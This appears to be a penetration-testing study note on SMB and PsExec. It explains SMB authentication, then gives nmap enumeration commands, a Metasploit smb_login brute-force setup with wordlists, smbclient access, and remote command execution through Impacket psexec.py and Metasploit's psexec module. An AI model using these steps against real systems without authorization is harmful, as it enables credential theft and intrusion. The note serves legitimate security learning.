SMB

SMB

SMB (Server Message Block) is a network file-sharing protocol used to share files, printers, and serial ports between computers on a local area network (LAN). It operates over port 445 (TCP), though it originally ran on top of NetBIOS using port 139. SMB allows devices to communicate and share resources like files and printers seamlessly. SAMBA, an open-source Linux implementation of SMB, enables Windows systems to access Linux shares and devices.

SMB uses two levels of authentication:

1. User Authentication – Users must provide a valid username and password to authenticate with the SMB server.

2. Share Authentication – A password is required to access restricted shared resources.

Both authentication levels rely on a challenge-response authentication system to verify access.

SMB Authentication

• Client sends an authentication request to the Server.

• The Server responds by encrypting a challenge string with the hash of the user's credentials.

• The Client returns the encrypted string to the Server.

• If the Server verifies the response, Access is Granted.

PsExec

PsExec is a lightweight telnet-replacement tool developed by Microsoft that enables you to execute processes on remote Windows systems using any user’s credentials. It authenticates through SMB. PsExec allows legitimate authentication with the target system to run arbitrary commands or launch a remote command prompt. Unlike RDP, which provides GUI control, PsExec sends commands via the command line (CMD).

SMB Exploitation w/ PsExec

To gain access to a Windows target using PsExec:

1. Identify legitimate user accounts and their passwords or hashes, typically done by performing an SMB login brute-force attack.

   • Focus on common Windows accounts like "administrator".

2. Perform SMB brute-force attack using tools to guess valid credentials for the target system.

3. Once valid credentials are obtained, use PsExec to authenticate with the target system.

4. Execute arbitrary system commands or obtain a reverse shell on the target via PsExec.

Brute-force -> Obtain Credentials -> Authenticate with PsExec -> Run Commands / Reverse Shell

Enumeration

nmap -sV -sC [IP]
nmap -p 445 --script smb-protocols [IP]

Brute-force SMB Login

msfconsole -q
search smb_login
use scanner/smb/smb_login
show options
set RHOSTS [Target IP]
set USER_FILE /usr/share/metaspolit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metaspolit-framework/data/wordlists/unix_passwords.txt
run 

# accessing smb
smbclient -L //TARGET_IP -U USERNAME
smbclient //TARGET_IP/SHARE_NAME -U USERNAME

PsExec is a Windows utility or portable executable, but since Linux systems cannot natively run Windows executables, you cannot directly execute PsExec on Linux. However, the psexec.py script from the Impacket toolkit provides a Python-based alternative, allowing you to use PsExec functionality on Linux by interacting with Windows systems. This script enables remote command execution on Windows targets via SMB, similar to the original PsExec utility.

https://github.com/fortra/impacket/tree/master
https://github.com/fortra/impacket/blob/master/examples/psexec.py

python3 psexec.py Administrator(user)@[TargetIP] cmd.exe

w/ Metasploit

use windows/smb/psexec
show options
set RHOSTS
set SMBPass
set SMBUser